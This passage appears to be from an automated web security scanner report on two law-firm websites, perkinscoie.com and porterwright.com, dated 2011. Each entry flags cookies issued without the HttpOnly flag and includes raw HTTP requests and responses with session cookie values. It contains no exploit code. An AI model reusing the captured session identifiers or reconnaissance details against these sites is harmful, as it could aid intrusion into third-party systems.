Referer: http://www.perkinscoie.com/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1089; PortletId=1901; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305216548.1; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:07 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 122863
Content-Length: 122863


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org
...[SNIP]...
18.155. http://www.perkinscoie.com/professionals/professionals_detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /professionals/professionals_detail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /professionals/professionals_detail.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 12 May 2011 16:56:52 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /pagenotfound
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 132

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fpagenotfound">here</a>.</h2>
</body></html>
18.156. http://www.perkinscoie.com/professionals/professionals_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /professionals/professionals_results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /professionals/professionals_results.aspx?LastName=Q HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/professionals/professionals.aspx
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:13 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 38843
Content-Length: 38843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>
       Perkins
...[SNIP]...
18.157. http://www.perkinscoie.com/professionals/professionals_vcard.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /professionals/professionals_vcard.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /professionals/professionals_vcard.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:56:52 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Transfer-Encoding: 7bit
Content-Description: VCard
Content-Disposition: inline; filename="vcard.vcf"
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/x-vcard; charset=us-ascii; name="vcard.vcf"
Content-Length: 136

BEGIN:VCARD
VERSION:2.1
N:;;;;
FN:
TITLE:
ORG:
TEL;WORK;VOICE:
TEL;WORK;FAX:
TEL;CELL;VOICE:
EMAIL;PREF;INTERNET:


URL;WORK:
END:VCARD
18.158. http://www.porterwright.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305202915.1305202915.1; __utmz=221978393.1305202915.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:00 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1160; path=/
Set-Cookie: PortletId=50001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=05jb5u2fs0tcpiy1tfysqevh; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 21792
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/
Content-Length: 21792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta name="descri
...[SNIP]...
18.159. http://www.porterwright.com/404.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /404.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /404.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 16:58:18 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 403


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
18.160. http://www.porterwright.com/FCWSite/Include/spamproof.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /FCWSite/Include/spamproof.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FCWSite/Include/spamproof.aspx HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/contactus/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305202915.1305216543.2; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1161; PortletId=51101; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=7; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:42:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/javascript; charset=us-ascii
ntCoent-Length: 1402
Content-Length: 1402

function SendMail(name, domain){ var BaseOptions = 'width=525,height=450,status=no,scrollbars=yes,resizeable=yes'; var win = window.open('http://www.porterwright.com/emailthispage/emdisclaimer.a
...[SNIP]...
18.161. http://www.porterwright.com/aboutus/xpqGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /aboutus/xpqGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aboutus/xpqGC.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:58:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1161; path=/
Set-Cookie: PortletId=51101; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <title></titl
...[SNIP]...
18.162. http://www.porterwright.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /careers/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/government--regulatory-affairs-practice-areas/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=0; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393; __utmb=221978393.3.10.1305218573

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:50:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1146; path=/
Set-Cookie: PortletId=36001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 41358
Content-Length: 41358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>


       <t
...[SNIP]...
18.163. http://www.porterwright.com/careers/xpqGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /careers/xpqGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/xpqGC.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:57:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1146; path=/
Set-Cookie: PortletId=36001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <title></titl
...[SNIP]...
18.164. http://www.porterwright.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /contactus/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactus/ HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305202915.1305216543.2; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=0; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:42:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
